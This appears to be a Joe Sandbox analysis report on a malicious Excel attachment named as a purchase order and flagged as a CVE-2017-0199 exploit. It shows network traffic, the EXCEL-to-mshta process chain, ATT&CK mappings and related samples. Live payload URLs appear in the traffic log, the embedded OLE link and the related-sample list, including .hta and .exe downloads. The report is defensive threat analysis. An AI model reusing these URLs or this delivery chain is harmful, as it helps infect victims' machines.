Source: global trafficHTTP traffic detected: GET /xampp/angel/cesgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PO#4500550389.xla.xlsxString found in binary or memory: https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableD
Source: unknownNetwork traffic detected: HTTP traffic on port 58544 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58543 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58538 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58543
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.9:58538 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.9:58542 version: TLS 1.2

System Summary

barindex
Source: PO#4500550389.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO#4500550389.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO#4500550389.xla.xlsxOLE indicator, VBA macros: true
Source: PO#4500550389.xla.xlsxStream path 'MBD00C9763B/\x1Ole' : https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableDAmwP#|--t#+EX3aR{%NoJ7QE|%v].al|!hEdzL;RFFxcq0hHYX2Q0rNvtFeAa1BDqDD3pNb3bgcRDoaRuO44Etx52CLmzs8X649k9SGYe9IqaLBCH0NwaELNn1J41JPRtrKnnkmlfvZGqdSl9KETEFZUWLp2LUk9z3Fj6UjpgdP4Q7zHGDNQt1iqtnVuCBnb3BmP9KUS0u78?- L]O!u`^p/
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'po#4500550389.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO#4500550389.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A40E41BF-25D9-4A94-9552-99F5E47F8325} - OProcSessId.datJump to behavior
Source: PO#4500550389.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 33%
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 19%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PO#4500550389.xla.xlsxStatic file information: File size 1172480 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: PO#4500550389.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO#4500550389.xla.xlsxStream path 'MBD00C9763A/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: PO#4500550389.xla.xlsxStream path 'Workbook' entropy: 7.99202969994 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 929Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640393 Sample: PO#4500550389.xla.xlsx Startdate: 17/03/2025 Architecture: WINDOWS Score: 60 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0032.t-0009.t-msedge.net 2->21 23 6 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Excel sheet contains many unusual embedded objects 2->33 35 Document exploit detected (process start blacklist hit) 2->35 37 Sigma detected: Suspicious Microsoft Office Child Process 2->37 7 EXCEL.EXE 234 66 2->7         started        11 EXCEL.EXE 53 47 2->11         started        signatures3 process4 dnsIp5 25 kryx.ru 188.225.72.170, 443, 58538 TIMEWEB-ASRU Russian Federation 7->25 27 s-part-0044.t-0009.fb-t-msedge.net 13.107.253.72, 443, 58542, 58543 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->27 29 198.12.89.24, 58539, 80 AS-COLOCROSSINGUS United States 7->29 17 C:\Users\user\...\~$PO#4500550389.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO#4500550389.xla.xlsx33%VirustotalBrowse
PO#4500550389.xla.xlsx19%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkable0%Avira URL Cloudsafe
https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableD0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    s-part-0044.t-0009.fb-t-msedge.net
    		13.107.253.72
    		truefalse
      		high
      kryx.ru
      		188.225.72.170
      		truefalse
        		high
        s-0005.dual-s-dc-msedge.net
        		52.123.130.14
        		truefalse
          		high
          otelrules.svc.static.microsoft
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkablefalse
            • Avira URL Cloud: safe
            		unknown
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              		high
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                		high
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  		high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableDPO#4500550389.xla.xlsxfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  13.107.253.72
                  		s-part-0044.t-0009.fb-t-msedge.netUnited States
                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  198.12.89.24
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse
                  188.225.72.170
                  		kryx.ruRussian Federation
                  		9123TIMEWEB-ASRUfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1640393
                  Start date and time:2025-03-17 09:41:02 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Without Instrumentation
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PO#4500550389.xla.xlsx
                  Detection:MAL
                  Classification:mal60.expl.winXLSX@6/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.28.47, 23.60.203.209, 199.232.214.172, 20.42.72.131, 20.42.65.90, 52.123.130.14, 20.190.160.67, 4.245.163.56
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdeus14.eastus.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, config.officeapps.live.com, onedscolprdeus00.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, europe.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:43:12API Interceptor959x Sleep call for process: splwow64.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  13.107.253.72S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                    NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                        Quotation.xlsGet hashmaliciousUnknownBrowse
                          https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04StW2tROdwwKr6jRaBFQun7DQsPCpIDdXBBFCv8a7W8LK7Rl6rwBC0tgURk55SBHyIzH8o575VHCM17sxou55q5sU-2BB8ESFPqFu-2FbpVoTlNake-2FQOhgnc23GE2x5-2BOAS2qCBGctpZ2IMzpWiWBU435uwa5-2FmA2HTxNem3-2Bt0ionxJjkqo4GGNcUs5-2BGYyYk-2FC6syojaGqt-2FBR8V6d6AroZskWO-2Btp2xcBwLL3o-2FZl7OSQxQ18gwEx-2BCrEr2XCC-2BjFJ7-2BDOC15dowjH72795CZZSHA-3Da76R_h5tndX3XP82u2CVP7HmVo430WGiFRFD0yG4tHzfM60QIQKknMz-2Bv4cvubxA4sUh-2F1aJ6qoya6273blXHvxERqm-2FEO-2BkfpUsxJp1Gre7i4RpcU3-2BZM-2Bz6eR0jjyehedttUWDFeqz7YehgBaJvqe4tJbDwyMaBzpAl1ycrHcR0yCJQvaIQ4aeF-2BQ-2B79-2B-2FlIK6fkzG-2B9ka9kfr1u2tUL7UElQ6I6ve-2BmqguhJR37zflsfTCQ6XW-2B9olHHI-2F-2FliITE0nSfPOkW6-2FWiGzwdjHPW9q36TssasiqezSGGoZpPD2wXb44aCqqvSglmXXnDeasuIi4iEVz8lUI9WDaOvlSsORhE9XfmCNPK7IqW58SgKJzo1pyrc2FIEkiket3ZcM2YtrGet hashmaliciousUnknownBrowse
                            http://lookerstudio%2e%67%6f%6f%67%6c%65%2e%63%6f%6d/s/tVpHSqKmotAGet hashmaliciousHTMLPhisherBrowse
                              Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                                Copy of 1- GCP Vendor Information Smart Form Stepan.xlsmGet hashmaliciousUnknownBrowse
                                  peYnzEuoAo.exeGet hashmaliciousHancitorBrowse
                                    198.12.89.24PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                                    niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                    • 198.12.89.24/346/cosses.exe
                                    Our Order.xlsGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                                    Our Order.xlsGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                                    PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                                    PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                                    PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    kryx.ruPO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    bg.microsoft.map.fastly.netNew order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    5rh5u9yBNf.exeGet hashmaliciousGuLoader, HTMLPhisherBrowse
                                    • 199.232.214.172
                                    SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                    • 199.232.214.172
                                    Spy-Net.exeGet hashmaliciousSalityBrowse
                                    • 199.232.210.172
                                    #U6d59#U6c5f#U6eab#U5dde#U75c5#U6bd2.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    The Earth.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    USE INCASE OF A SEVERE FORKIE.exeGet hashmaliciousBabadedaBrowse
                                    • 199.232.210.172
                                    theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                    • 199.232.210.172
